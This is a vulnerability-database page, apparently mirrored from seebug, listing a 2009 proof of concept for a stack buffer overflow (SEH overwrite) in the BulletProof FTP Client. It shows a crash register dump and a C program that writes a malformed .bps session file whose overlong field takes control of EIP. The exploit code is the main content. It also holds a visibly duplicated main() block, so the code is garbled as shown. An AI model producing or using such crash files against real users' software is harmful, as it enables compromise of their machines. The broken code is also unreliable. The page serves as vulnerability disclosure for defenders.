Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

BulletProof FTP 2.63 b56 Client Malformed '.bps' File Stack Buffer Overflow

🗓️ 07 Oct 2009 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 14 Views

BulletProof FTP 2.63 b56 Client buffer overflo

Code

                                                
/*
BulletProof FTP Client suffer a buffer overflow (SEH).

Tested on BullerProof FTP Client v. 2.63 build 56 (The last one) but may work with older releases as well

Registers:

EAX 00000000
ECX 65646362
EDX 7C9032BC ntdll.7C9032BC
EBX 00000000
ESP 0012F1E0
EBP 0012F200
ESI 00000000
EDI 00000000
EIP 65646362
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -??? FFFF 00FF00FF 00FF00FF
ST1 empty -??? FFFF 00FF00FF 00FF00FF
ST2 empty -??? FFFF 000000F3 00F300F3
ST3 empty -??? FFFF 000000F3 00F300F3
ST4 empty -??? FFFF 00F4F4F4 00F4F4F4
ST5 empty 7.2337335968722701770e+18
ST6 empty 7.3060737696935038410e+18
ST7 empty 7.0169967652934372810e+18
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char *xpl;
char *str;
char message[]="This is a BulletProof FTP Client Session-File and should not be modified directly.\n";
char trash[]="21\nanything\nbpfdhjomeepehepbflql\nC:\\\n/";

int main(){
    int tam;
    FILE *fp;
    printf("Made by: Rafael Sousa\n");
    printf("Produzido por Rafael Sousa\n");

int main(){
    int tam;
    FILE *fp;
    printf("Made by: Rafael Sousa\n");
    printf("Produzido por Rafael Sousa\n");
    str=(char *)malloc(98*sizeof(char));
    memset(str,'a',93);
    str[93]='b';
    str[94]='c';
    str[95]='d';
    str[96]='e';
    str[97]='\0';
    tam=strlen(str)+strlen(message)+strlen(trash);
    printf("%d\n",tam);
    xpl=(char *)malloc((tam+1)*sizeof(char));
    sprintf(xpl,"%s%s\n%s",message,str,trash);
    fp=fopen("POC.bps","w");
    fputs(xpl,fp);
    fclose(fp);
    free(str);
    free(xpl);
    return(0);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Oct 2009 00:00Current
7.1High risk
Vulners AI Score7.1
bulletproof ftpbuffer overflowclient vulnerabilitystack buffer.overflowfile vulnerability
14